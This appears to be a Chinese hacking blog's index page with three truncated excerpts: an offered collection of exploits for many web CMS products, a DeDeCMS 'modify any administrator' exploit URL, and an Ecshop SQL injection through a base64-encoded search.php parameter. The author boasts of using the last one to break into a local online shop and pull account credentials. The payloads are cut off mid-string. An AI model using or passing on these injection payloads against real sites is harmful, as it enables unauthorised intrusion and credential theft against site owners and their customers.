分享一个个人珍藏版的东西，里面有08CMS、AKCMS、bbsxp、BLUECMS、CreateLiveCMS、DeDeCMS、discuz、Diy-Page、Drupal、DVBBS、Ecshop、joomla、KINGCMS 、NBArticle、Oblog、php168、phpbb、phpcms、PHPweb、phpwind、Shopex、UCHOME、wordpress、Z-BLOG、帝国 [Read More…]

1、修改任意管理员漏洞

EXP：

plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95

&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[ [Read More…]

发现本地有家商城太自大了，真是目中无人啊…果断拿下给个警告，下面记载下这个Ecshop通杀漏洞吧！

先用下面的代码看下表的前缀（运气好下面的代码就把账号密码注射出来了）

search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCB [Read More…]